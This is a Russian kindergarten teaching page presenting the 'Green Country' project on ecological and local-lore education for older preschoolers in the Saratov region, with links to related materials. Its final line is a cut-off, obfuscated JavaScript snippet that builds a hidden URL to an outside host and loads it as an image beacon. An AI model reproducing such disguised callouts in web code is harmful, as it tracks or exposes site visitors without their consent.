«Краеведческая деятельность – как средство экологического воспитания дошкольников» Проект «Зеленая страна»
проект (старшая группа)
С началом работы нашей экспериментальной площадки мы задались вопросами: как помочь детям научиться сочувствовать окружающей живой природе и заботиться о природных объектах? Как научить детей ценить мир и справедливость? Как развивать любовь к природе и стремление защищать ее? Чтобы ответить на эти важные вопросы мы решили разработать образовательный проект экологического краеведения -как всестороннего познания природы родного края и ответственного отношение к ней. Свой проект мы назвали «Зеленая страна».
Цель: формирование у детей осознанно правильного отношения к природным явлениям и объектам, которые окружают их, и с которыми они знакомятся в дошкольном детстве.
Задачи:
-способствовать развитию познавательной и творческой активности детей дошкольного возраста, формирование у дошкольников желание в дальнейшем самостоятельно получать и приобретать знания о родном крае.
- формировать представления о животном и растительном мире, о Красной книге Саратовской области.
- сформировать у детей чувство ответственности за жизнь, природу, а также сознание необходимости ее защиты;
- воспитать бережное отношение к природе.
Скачать:
Предварительный просмотр:
Подписи к слайдам:
Цель проекта : формирование у детей осознанно правильного отношения к природным явлениям и объектам, которые окружают их, и с которыми они знакомятся в дошкольном детстве. Задачи : - расширить представления детей о природе родного края; - развивать у детей умственную активность, сообразительность, наблюдательность, умение сравнивать; - наглядно увидеть , понять связи и зависимость в окружающем мире. -способствовать развитию познавательной и творческой активности детей дошкольного возраста, формирование у дошкольников желание в дальнейшем самостоятельно получать и приобретать знания о родном крае. - формировать представления о животном и растительном мире родного края, о Красной книге Саратовской области. - сформировать у детей чувство ответственности за жизнь, природу, а также сознание необходимости ее защиты; - воспитать бережное отношение к природе.
Краткое описание проекта по этапам. Тип проекта: групповой, познавательно - экологический. Продолжительность проекта: д олгосрочный 2 года. Сроки реализации проекта: сентябрь 2018 г. - май 2020 г. I Подготовительный этап. 1. Разработка программы краеведения « Зеленая страна» 2. Обсуждение с родителями проекта, выяснение возможностей, средств, необходимых для реализации проекта, определение содержания деятельности всех участников проекта. II Основной этап реализации проекта. 1. Выполнение плана работы по всем видам деятельности с детьми; 2. Взаимодействие с родителями для решения поставленных задач. - Создание информационного пространства (информационный стенд; оформление папки - передвижки). 3. Подборка художественных произведений, дидактических игр по данной теме III . Заключительный этап. Диагностика и подведение результатов работы. подведение итогов работы над проектом; анкетирование родителей по теме: «Чему научился Ваш ребёнок? »; мониторинг качества освоения материала детьми; открытое занятие - развлечение для родителей "Чему мы научились" (по итогам проекта) презентация проекта для педагогов ДОУ, сообщение из опыта работы по проекту.
исследовательские словесные Практические наблюдения прогулки экскурсии моделирование игры НОД,мероприятия беседы объяснения Чтение худ. л ит- ры консультации Методы и формы реализации проекта:
Прогнозируемые результаты: формирование у детей основ экологической культуры и культуры природолюбия . получение знаний о различиях живой и неживой природы, особенностях природы Ершовского района. развитие в ребенке внутренней потребности любви к природе, участию в природоохранной и экологической деятельности. расширение общего кругозора детей, развитие их творческих способностей, участие в конкурсах экологической направленности различного уровня.
Содержание разделов: 2 блок : « Природа родного края» 3блок : « Животный мир нашего края» 4 блок : « Знакомство с Красной книгой» Саратовской области 1 блок : « Моя малая Родина город Ершов»
По теме: методические разработки, презентации и конспекты
опыт работы"«Театрально-игровая деятельность как средство ознакомления дошкольников с художественной литературой»
"Волшебный край!" - так когда-то назвал театр великий русский поэт А.С.Пушкин. "Любите ли вы театр так, как я люблю его?" - спрашивал своих современников Виссарион Белинский, глубоко убежденный в том,...
"Игровая деятельность как средство социализации дошкольников"
Представлен проект ....
Проект: Эколого- краеведческая деятельность как средство патриотического воспитания дошкольников
Национальная доктрина образования в Российской Федерации, а также Федеральная программа развития образования называют в числе основных задач общества патриотическое воспитание через экологическую и кр...
Краеведческая деятельность как средство приобщения к традициям общества и государства
Данная презентация - это опыт работы ДОУ по приобщению детей к традициям общества и государства с помощью системы работы по краеведению....
"Краеведческая деятельность как средство патриотизма старших дошкольников"
Наиболее важной частью нравственного воспитания всегда остаётся воспитание подрастающего поколения в духе патриотизма. Патриотическое воспитание наших детей начинается с...
«Краеведческая деятельность – как средство экологического воспитания дошкольников» Проект «Зеленая страна»
С началом работы нашей экспериментальной площадки мы задались вопросами: как помочь детям научиться сочувствовать окружающей живой природе и заботиться о природных объектах? Как научить детей ценить м...
Презентация проекта (старшая группа) «Краеведческая деятельность как средство патриотического воспитания дошкольников»
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...